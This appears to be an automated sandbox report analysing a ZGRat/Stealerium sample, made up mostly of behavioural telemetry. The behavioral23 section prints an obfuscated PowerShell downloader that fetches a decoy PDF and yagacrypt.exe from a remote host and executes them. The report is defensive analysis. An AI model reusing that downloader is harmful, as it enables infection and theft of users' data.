Malware Analysis Report

2024-10-19 06:53

Sample ID 240119-y3w7hsdee7
Target magic.poisontoolz.com.zip
SHA256 84765d5c0c038297793d431f04f2096bfce69ca41c50696c36bc0f3ba1369c05
Tags
zgrat rat spyware stealer stealerium collection
score
10/10

Analysis Overview

score
10/10

SHA256

84765d5c0c038297793d431f04f2096bfce69ca41c50696c36bc0f3ba1369c05

Threat Level: Known bad

The file magic.poisontoolz.com.zip was found to be: Known bad.

Malicious Activity Summary

zgrat rat spyware stealer stealerium collection

Stealerium

ZGRat

Detect ZGRat V1

Blocklisted process makes network request

Downloads MZ/PE file

Drops startup file

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

Accesses Microsoft Outlook profiles

Enumerates connected drives

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious use of FindShellTrayWindow

outlook_office_path

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Checks processor information in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-19 20:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

93s

Max time network

149s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Jafxaspdhim.vdf

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Jafxaspdhim.vdf

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 55.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:24

Platform

win10v2004-20231215-en

Max time kernel

156s

Max time network

174s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\fox.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\yagacrypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\yagacrypt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ggiac.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ggiac.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 1868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 1868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1868 wrote to memory of 2996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 1868 wrote to memory of 2996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 1868 wrote to memory of 2996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 1868 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\yagacrypt.exe
PID 1868 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\yagacrypt.exe
PID 1868 wrote to memory of 4080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\yagacrypt.exe
PID 2996 wrote to memory of 2116 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2996 wrote to memory of 2116 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2996 wrote to memory of 2116 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 692 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3208 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\fox.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hPhLUO($gYYfVUqro, $TDHCoMacW){[IO.File]::WriteAllBytes($gYYfVUqro, $TDHCoMacW)};function OuyjBhDPrdGwPbLI($gYYfVUqro){if($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38832,38840,38840))) -eq $True){rundll32.exe $gYYfVUqro }elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38844,38847,38781))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gYYfVUqro}elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38841,38847,38837))) -eq $True){misexec /qn /i $gYYfVUqro}else{Start-Process $gYYfVUqro}};function wZPwXqcGcNksDcvtMGB($uyaYBkDZCCSyzJDelsei){$iFRLJMGtgESMZFs = New-Object (bGYiXoWxyxIAMYfHnL @(38810,38833,38848,38778,38819,38833,38830,38799,38840,38837,38833,38842,38848));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$TDHCoMacW = $iFRLJMGtgESMZFs.DownloadData($uyaYBkDZCCSyzJDelsei);return $TDHCoMacW};function bGYiXoWxyxIAMYfHnL($NWBOMT){$RZDKPliAxJ=38732;$BhXTohPOo=$Null;foreach($eKsxkGZtQqIkdSPR in $NWBOMT){$BhXTohPOo+=[char]($eKsxkGZtQqIkdSPR-$RZDKPliAxJ)};return $BhXTohPOo};function gNBuaXtjuReBmDfHma(){$hIYbSEpsSJoZXPH = $env:AppData + '\';$YQPfBhOhZMdWRyHeqKPdf = $hIYbSEpsSJoZXPH + 'RIB.pdf';If(Test-Path -Path $YQPfBhOhZMdWRyHeqKPdf){Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;}Else{ $arPZzcSlEyncTeAIE = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38814,38805,38798,38778,38844,38832,38834));hPhLUO $YQPfBhOhZMdWRyHeqKPdf $arPZzcSlEyncTeAIE;Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;};$RYunDk = $hIYbSEpsSJoZXPH + 'yagacrypt.exe'; if (Test-Path -Path $RYunDk){OuyjBhDPrdGwPbLI $RYunDk;}Else{ $ehQGZXVzn = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38853,38829,38835,38829,38831,38846,38853,38844,38848,38778,38833,38852,38833));hPhLUO $RYunDk $ehQGZXVzn;OuyjBhDPrdGwPbLI $RYunDk;};;;;}gNBuaXtjuReBmDfHma;

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\RIB.pdf"

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

"C:\Users\Admin\AppData\Roaming\yagacrypt.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0C7AA00897205B0621305857D4844299 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

